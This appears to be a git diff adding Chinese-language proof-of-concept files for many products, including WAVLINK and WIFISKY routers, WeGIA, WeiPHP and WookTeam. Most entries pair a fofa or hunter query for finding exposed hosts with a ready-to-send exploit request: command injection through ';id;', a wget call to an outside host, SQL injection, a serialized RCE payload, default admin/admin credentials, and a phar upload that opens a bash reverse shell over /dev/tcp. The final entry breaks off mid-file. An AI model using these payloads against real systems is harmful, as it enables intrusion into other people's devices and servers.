+W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞
+
+## fofa
+```javascript
+icon_hash="616947260"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735566773129-315b9dc0-988c-47d2-a333-a2b6f4a7ec14.png)
+
+## poc
+```http
+GET /DLP/public/admintool/system_setting/sys_ds_logfile_displaylog.jsp?logType=tomcat&logFileName=../../../../../../D-Security/webapps/DLPWebApps/WEB-INF/web.xml HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Priority: u=0, i
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
+Upgrade-Insecure-Requests: 1
+```
+
+![](https://cdn.nlark.com/yuque/0/2025/png/29512878/1735835640864-6262a6b5-db98-4860-a798-d2a539429bfa.png)
+
diff --git a/WAVLINKadm.cgi命令执行漏洞.md b/WAVLINKadm.cgi命令执行漏洞.md
new file mode 100644
index 0000000..9d280d6
--- /dev/null
+++ b/WAVLINKadm.cgi命令执行漏洞.md
@@ -0,0 +1,40 @@
+# WAVLINK adm.cgi命令执行漏洞
+
+# 一、漏洞简介
+WAVLINK是中国睿因科技（WAVLINK）公司开发的一款路由器，该系统adm.cgi文件存在命令执行漏洞，攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。
+
+# 二、影响版本
++ wavlink 路由器
+
+# 三、资产测绘
++ hunter`web.body="firstFlage"`
++ 特征
+
+![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/g25y0jJy9HEuSzIf/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-154106.png)
+
+# 四、漏洞复现
+```java
+POST /cgi-bin/adm.cgi HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 26
+
+page=sysCMD&command=";id;"
+```
+
+![1703227525600-a2c72405-b4ed-41d9-b3a9-5fcaf6b9bb7e.png](./img/g25y0jJy9HEuSzIf/1703227525600-a2c72405-b4ed-41d9-b3a9-5fcaf6b9bb7e-661984.png)
+
+nuclei脚本
+
+[wanlink-router-adm-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231419-b11f1277-6ff4-4254-8a64-b9fd783e0f85.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ur96lfz8saqpabto>
\ No newline at end of file
diff --git a/WAVLINKlive_api.cgi存在命令执行.md b/WAVLINKlive_api.cgi存在命令执行.md
new file mode 100644
index 0000000..4c26371
--- /dev/null
+++ b/WAVLINKlive_api.cgi存在命令执行.md
@@ -0,0 +1,36 @@
+# WAVLINK live_api.cgi 存在命令执行
+
+# 一、漏洞简介
+WAVLINK wavlink是中国睿因科技（WAVLINK）公司的一款路由器。连接两个或多个网络的硬件设备，在网络间起网关的作用。WAVLINK 多款路由器 live_api.cgi 存在命令执行，攻击者可通过此漏洞获取权限。
+
+# 二、影响版本
++ wavlink 路由器
+
+# 三、资产测绘
++ hunter`web.body="firstFlage"`
++ 特征
+
+![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/eM5UpXtfHuIL8Dph/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-816220.png)
+
+# 四、漏洞复现
+```java
+GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1703226886159-a96b555d-7af9-4b07-84b0-7ab51ca44a69.png](./img/eM5UpXtfHuIL8Dph/1703226886159-a96b555d-7af9-4b07-84b0-7ab51ca44a69-201909.png)
+
+nuclei脚本
+
+[wanlink-router-live-api-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231462-65f524b5-3aa2-4cd2-a4b3-8783722d7a12.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/on0bkn7zcvll4ivu>
\ No newline at end of file
diff --git a/WAVLINKmesh.cgi命令执行漏洞（CVE-2022-2486）.md b/WAVLINKmesh.cgi命令执行漏洞（CVE-2022-2486）.md
new file mode 100644
index 0000000..16f2821
--- /dev/null
+++ b/WAVLINKmesh.cgi命令执行漏洞（CVE-2022-2486）.md
@@ -0,0 +1,51 @@
+# WAVLINK mesh.cgi命令执行漏洞（CVE-2022-2486）
+
+# 一、漏洞简介
+WAVLINK是中国睿因科技（WAVLINK）公司开发的一款路由器，该系统mesh.cgi文件存在命令执行漏洞，攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。
+
+# 二、影响版本
++ wavlink 路由器
+
+# 三、资产测绘
++ hunter`web.body="firstFlage"`
++ 特征
+
+![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/2z5YOmq5xdN4GgtQ/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-764354.png)
+
+# 四、漏洞复现
+```java
+GET /cgi-bin/mesh.cgi?page=upgrade&key=';ls>./1.txt;' HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1703227123408-ad76b97b-fbb5-48b3-a932-877f8d037798.png](./img/2z5YOmq5xdN4GgtQ/1703227123408-ad76b97b-fbb5-48b3-a932-877f8d037798-976428.png)
+
+获取命令执行结果
+
+```java
+GET /cgi-bin/1.txt HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1703227153612-9f8d4f5b-341e-4c8a-bfed-f618c459f555.png](./img/2z5YOmq5xdN4GgtQ/1703227153612-9f8d4f5b-341e-4c8a-bfed-f618c459f555-527638.png)
+
+nuclei脚本
+
+[wanlink-router-mesh-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231422-206fa714-944a-44f8-b5df-ab0069039061.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wnwb9zre4ushwzb8>
\ No newline at end of file
diff --git a/WAVLINKnightled.cgi命令执行漏洞（CVE-2022-2487）.md b/WAVLINKnightled.cgi命令执行漏洞（CVE-2022-2487）.md
new file mode 100644
index 0000000..8cd88ce
--- /dev/null
+++ b/WAVLINKnightled.cgi命令执行漏洞（CVE-2022-2487）.md
@@ -0,0 +1,40 @@
+# WAVLINK nightled.cgi命令执行漏洞（CVE-2022-2487）
+
+# 一、漏洞简介
+WAVLINK是中国睿因科技（WAVLINK）公司开发的一款路由器，该系统nightled.cgi文件存在命令执行漏洞，攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。
+
+# 二、影响版本
++ wavlink 路由器
+
+# 三、资产测绘
++ hunter`web.body="firstFlage"`
++ 特征
+
+![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/Rx--2uKs5UATt6Ld/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-514022.png)
+
+# 四、漏洞复现
+```java
+POST /cgi-bin/nightled.cgi HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+
+page=night_led&start_hour=;id;
+```
+
+![1703227926824-33cc9c9a-e440-48db-872e-8e7dfe23d5ed.png](./img/Rx--2uKs5UATt6Ld/1703227926824-33cc9c9a-e440-48db-872e-8e7dfe23d5ed-728776.png)
+
+nuclei脚本
+
+[wanlink-router-nightled-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231412-9b8a48ea-e19e-4635-93d4-e8e9113dabfa.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gt5g5cgio0f29oaf>
\ No newline at end of file
diff --git a/WIFISKY7层流控路由器confirm存在命令执行漏洞.md b/WIFISKY7层流控路由器confirm存在命令执行漏洞.md
new file mode 100644
index 0000000..435f62d
--- /dev/null
+++ b/WIFISKY7层流控路由器confirm存在命令执行漏洞.md
@@ -0,0 +1,57 @@
+# WIFISKY 7层流控路由器confirm存在命令执行漏洞
+
+# 一、漏洞简介
+WIFISKY-7层流控路由器是深圳市领空技术有限公司（简称“领空技术"）的一款产品，深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商，致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器 confirm 接口存在一个命令执行漏洞，使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令，严重威胁系统的机密性和完整性。
+
+# 二、影响版本
++ WIFISKY-7层流控路由器
+
+# 三、资产测绘
++ fofa`title="WIFISKY 7层流控路由器"`
++ 特征
+
+![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/FCIn4YzdQmapH-Qa/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-024206.png)
+
+# 四、漏洞复现
+```http
+GET /notice/confirm.php?t=;sleep%203 HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1715173433508-2e7146ea-18f4-45ff-8d01-238623ada4e0.png](./img/FCIn4YzdQmapH-Qa/1715173433508-2e7146ea-18f4-45ff-8d01-238623ada4e0-359859.png)
+
+```http
+GET /notice/confirm.php?t=;ping%20ofo3df.dnslog.cn HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1715173494704-e184b918-38a2-45ce-a6ec-4a26f9712427.png](./img/FCIn4YzdQmapH-Qa/1715173494704-e184b918-38a2-45ce-a6ec-4a26f9712427-455592.png)
+
+
+
+> 更新: 2024-05-14 11:23:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rgxgp78mynikfbld>
\ No newline at end of file
diff --git a/WIFISKY7层流控路由器index存在命令执行漏洞.md b/WIFISKY7层流控路由器index存在命令执行漏洞.md
new file mode 100644
index 0000000..612a3e7
--- /dev/null
+++ b/WIFISKY7层流控路由器index存在命令执行漏洞.md
@@ -0,0 +1,32 @@
+# WIFISKY 7层流控路由器index存在命令执行漏洞
+
+# 一、漏洞简介
+WIFISKY-7层流控路由器是深圳市领空技术有限公司（简称“领空技术"）的一款产品，深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商，致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器 index 接口存在一个命令执行漏洞，使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令，严重威胁系统的机密性和完整性。
+
+# 二、影响版本
++ WIFISKY-7层流控路由器
+
+# 三、资产测绘
++ fofa`title="WIFISKY 7层流控路由器"`
++ 特征
+
+![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/lbdF8AT5TnJVh0_m/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-551146.png)
+
+# 四、漏洞复现
+```http
+POST /portal/ibilling/index.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+
+{"type":5,"version":2,"bypass":";wget guzyybmley.dgrh3.cn"}
+```
+
+![1717868463587-8eea369e-a6b5-488c-85d3-0242dd3f45d6.png](./img/lbdF8AT5TnJVh0_m/1717868463587-8eea369e-a6b5-488c-85d3-0242dd3f45d6-720469.png)
+
+![1717868416844-14f8d78b-79b8-4b06-8a9a-4e0c81dfea9b.png](./img/lbdF8AT5TnJVh0_m/1717868416844-14f8d78b-79b8-4b06-8a9a-4e0c81dfea9b-880444.png)
+
+
+
+> 更新: 2024-06-11 10:28:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gogz90zifcvt0b1o>
\ No newline at end of file
diff --git a/WIFISKY7层流控路由器jumper存在命令执行漏洞.md b/WIFISKY7层流控路由器jumper存在命令执行漏洞.md
new file mode 100644
index 0000000..e3b75dc
--- /dev/null
+++ b/WIFISKY7层流控路由器jumper存在命令执行漏洞.md
@@ -0,0 +1,57 @@
+# WIFISKY 7层流控路由器jumper存在命令执行漏洞
+
+# 一、漏洞简介
+WIFISKY-7层流控路由器是深圳市领空技术有限公司（简称“领空技术"）的一款产品，深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商，致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器 jumper 接口存在一个命令执行漏洞，使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令，严重威胁系统的机密性和完整性。
+
+# 二、影响版本
++ WIFISKY-7层流控路由器
+
+# 三、资产测绘
++ fofa`title="WIFISKY 7层流控路由器"`
++ 特征
+
+![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/Oead-PjWp865K9ib/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-078523.png)
+
+# 四、漏洞复现
+```http
+GET /notice/jumper.php?t=;sleep%203 HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1715173637857-4aaac66b-8ff2-4825-a42c-69652583edd7.png](./img/Oead-PjWp865K9ib/1715173637857-4aaac66b-8ff2-4825-a42c-69652583edd7-056223.png)
+
+```http
+GET /notice/jumper.php?t=;ping%20h6n6s2.dnslog.cn HTTP/1.1
+Host: 
+Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1715173681881-5c92bdfd-9347-4e56-aef0-31a903b916b5.png](./img/Oead-PjWp865K9ib/1715173681881-5c92bdfd-9347-4e56-aef0-31a903b916b5-767536.png)
+
+
+
+> 更新: 2024-05-14 11:23:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ged48gfhow3bphsa>
\ No newline at end of file
diff --git a/WIFISKY7层流控路由器存在后台命令执行漏洞.md b/WIFISKY7层流控路由器存在后台命令执行漏洞.md
new file mode 100644
index 0000000..b3dee4d
--- /dev/null
+++ b/WIFISKY7层流控路由器存在后台命令执行漏洞.md
@@ -0,0 +1,33 @@
+# WIFISKY 7层流控路由器存在后台命令执行漏洞
+
+# 一、漏洞简介
+WIFISKY-7层流控路由器是深圳市领空技术有限公司（简称“领空技术"）的一款产品，深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商，致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器存在后台命令执行漏洞
+
+# 二、影响版本
++ WIFISKY-7层流控路由器
+
+# 三、资产测绘
++ fofa`title="WIFISKY 7层流控路由器"`
++ 特征
+
+![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/q1vw9flS-_qCQfPi/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-517299.png)
+
+# 四、漏洞复现
+通过弱口令登录系统
+
+```http
+admin/admin
+```
+
+使用弱口令登录后台，在系统维护->命令控制台中进行执行命令
+
+```http
+ifconfig && id
+```
+
+![1717871175515-28ecddaf-64c1-4337-9e95-939d6b760612.png](./img/q1vw9flS-_qCQfPi/1717871175515-28ecddaf-64c1-4337-9e95-939d6b760612-257040.png)
+
+
+
+> 更新: 2024-06-11 10:28:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/em1kq8wstwsanpz7>
\ No newline at end of file
diff --git a/WIFISKY7层流控路由器存在弱口令漏洞.md b/WIFISKY7层流控路由器存在弱口令漏洞.md
new file mode 100644
index 0000000..9a4af59
--- /dev/null
+++ b/WIFISKY7层流控路由器存在弱口令漏洞.md
@@ -0,0 +1,25 @@
+# WIFISKY 7层流控路由器存在弱口令漏洞
+
+# 一、漏洞简介
+WIFISKY-7层流控路由器是深圳市领空技术有限公司（简称“领空技术"）的一款产品，深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商，致力于网络通讯设备产品的研究与开发。WIFISKY 7层流控路由器存在弱口令漏洞。
+
+# 二、影响版本
++ WIFISKY-7层流控路由器
+
+# 三、资产测绘
++ fofa`title="WIFISKY 7层流控路由器"`
++ 特征
+
+![1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe.png](./img/nDrG3JUk7KVvfWzn/1715173367617-aaada69e-bcaf-4f05-8166-b5ff817cdcfe-260197.png)
+
+# 四、漏洞复现
+```http
+admin/admin
+```
+
+![1717866986320-ce91af60-dfc6-433a-a7b0-49f5359eced7.png](./img/nDrG3JUk7KVvfWzn/1717866986320-ce91af60-dfc6-433a-a7b0-49f5359eced7-008493.png)
+
+
+
+> 更新: 2024-06-11 10:28:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xovl7d0wfl2x9txr>
\ No newline at end of file
diff --git a/WeGIA存在前台任意文件上传漏洞.md b/WeGIA存在前台任意文件上传漏洞.md
new file mode 100644
index 0000000..9a3bc4d
--- /dev/null
+++ b/WeGIA存在前台任意文件上传漏洞.md
@@ -0,0 +1,38 @@
+# WeGIA存在前台任意文件上传漏洞
+
+**WeGIA是一个福利机构管理器，并且具有一下几种功能，并且在3.2.8及之前版本都存在前台任意文件上传漏洞，且都可进行直接上传Phar等文件执行任意命令，反弹Shell等操作。**
+
+## fofa
+
+```javascript
+"./assets/vendor/select2/select2.js"
+```
+
+## poc
+
+phar内容
+
+```php
+<?php
+$ip = 'IP';
+$port = 4444;
+system("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");
+?>
+
+```
+
+将phar文件上传
+
+```javascript
+/WeGIA/html/socio/sistema/controller/controla_xlsx.php
+```
+
+![image-20250127154942138](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501271549223.png)
+
+上传后，文件在 /WeGIA/html/socio/sistema/tabelas/shell.phar
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501271550801.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/GhaxwVBzJKHf0AucOU6hbw
\ No newline at end of file
diff --git a/WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md b/WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md
new file mode 100644
index 0000000..bcbc96a
--- /dev/null
+++ b/WeiPHP微信开发框架Notice_index接口处存在远程代码执行漏洞.md
@@ -0,0 +1,49 @@
+# WeiPHP微信开发框架Notice/index接口处存在远程代码执行漏洞
+
+# 一、漏洞简介
+WeiPHP是一款基于PHP开发的开源微信公众号开发框架。它提供了丰富的功能和易于使用的接口，使开发者能够快速构建和管理微信公众号应用。WeiPHP支持自定义菜单、消息管理、用户管理、素材管理、支付接口等功能，同时还提供了插件机制和模块化开发，方便扩展和定制。WeiPHP是一个成熟的框架，被广泛应用于微信公众号开发领域。WeiPHP Notice/index接口处存在远程代码执行漏洞，恶意攻击者可能会利用此漏洞执行恶意命令，可能会导致敏感信息泄露或者服务器失陷。
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ <font style="color:rgb(36, 41, 46);background-color:rgb(248, 248, 248);">WeiPHP微信开发框架</font>
+
+# 三、资产测绘
++ fofa: `<font style="color:rgb(36, 41, 46);background-color:rgb(248, 248, 248);">body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0" </font>`
++ hunter:`<font style="color:rgb(36, 41, 46);background-color:rgb(248, 248, 248);"> app.name="weiphp"</font>`
++ 特征![1712767294333-f9397fc0-6329-4dc2-a72e-83464dd6b5c2.png](./img/wzsbo6eygrGh40i-/1712767294333-f9397fc0-6329-4dc2-a72e-83464dd6b5c2-055186.png)
+
+# 四、漏洞复现
+```java
+POST /public/index.php/weixin/Notice/index?img=echo+md5(789);exit(); HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+
+<xml>
+<product_id>aaaa</product_id>
+<appid>exp</appid>
+<appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
+<mch_id>aaa</mch_id>
+<nonce_str>aaa</nonce_str>
+<openid>aaa</openid>
+</xml>
+```
+
+
+
+![1712767557239-9a1def0e-1f58-41eb-a642-051f31707807.png](./img/wzsbo6eygrGh40i-/1712767557239-9a1def0e-1f58-41eb-a642-051f31707807-441317.png)
+
+```java
+68053af2923e00204c3ca7c6a3150cf7
+```
+
+![1712767762677-42a5be51-6ee4-4c82-af10-a882880fc2b0.png](./img/wzsbo6eygrGh40i-/1712767762677-42a5be51-6ee4-4c82-af10-a882880fc2b0-063880.png)
+
+![1712767598316-ce095c0c-d845-4dd2-ace5-377ecb467012.png](./img/wzsbo6eygrGh40i-/1712767598316-ce095c0c-d845-4dd2-ace5-377ecb467012-669483.png)
+
+[weiphp.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713623246456-79b26a39-f9b2-48d5-b784-34d89bcd5bfa.yaml)
+
+
+
+> 更新: 2024-04-20 22:27:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fhggt0ihwa4s9n1a>
\ No newline at end of file
diff --git a/WinRAR-CVE-2023-38831.md b/WinRAR-CVE-2023-38831.md
new file mode 100644
index 0000000..3fbc367
--- /dev/null
+++ b/WinRAR-CVE-2023-38831.md
@@ -0,0 +1,7 @@
+
+## CVE-2023-38831
+
+## 漏洞复现
+```
+https://mp.weixin.qq.com/s/UXWW7nuu52r7p6x9R3EcNA
+```
diff --git a/WookTeamsearchinfo存在SQL注入漏洞.md b/WookTeamsearchinfo存在SQL注入漏洞.md
new file mode 100644
index 0000000..aab23f0
--- /dev/null
+++ b/WookTeamsearchinfo存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# WookTeam searchinfo存在SQL注入漏洞
+
+# 一、漏洞简介
+WookTeam是一款轻量级的开源在线团队协作工具，提供各类文档协作工具、在线思维导图、在线流程图、项目管理、任务分发、即时IM，知识库管理等工具。WookTeam接口searchinfo存在SQL注入漏洞
+
+# 二、影响版本
++ WookTeam 
+
+# 三、资产测绘
+```plain
+title="Wookteam"
+```
+
+![1723565393982-8aeb7f0d-5fe1-4076-a035-5aed15fa18e4.png](./img/JZaYfNdClRdp56X9/1723565393982-8aeb7f0d-5fe1-4076-a035-5aed15fa18e4-952469.png)
+
+# 四、漏洞复现
+```plain
+GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
+Host: 
+```
+
+![1723565359190-f3c20851-b4e8-45d4-8716-b8b370ef4c3c.png](./img/JZaYfNdClRdp56X9/1723565359190-f3c20851-b4e8-45d4-8716-b8b370ef4c3c-341062.png)
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ocbt8satalaaymlq>
\ No newline at end of file
diff --git a/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md b/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md
new file mode 100644
index 0000000..bdce5a0
--- /dev/null
+++ b/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞
+
+WookTeam /api/users/searchinfo 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+title="Wookteam"
+```
+
+## poc
+
+```java
